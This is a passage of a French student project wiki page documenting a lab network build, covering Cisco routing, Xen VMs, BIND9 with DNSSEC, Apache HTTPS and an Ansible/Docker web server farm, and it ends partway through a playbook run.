  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
 PLAY [webservers]     *********************************************************************************************************************************************** *******&lt;br /&gt;
&lt;br /&gt;
 TASK [Gathering Facts]  *************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [1. Copying Website files] ****************************************************************************************************************************************&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [2. Copying Dockerfile] *******************************************************************************************************************************************&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [3. Install pip] **************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [4. install docker package] ***************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [5. Stop container if running] ************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [delete image] ****************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
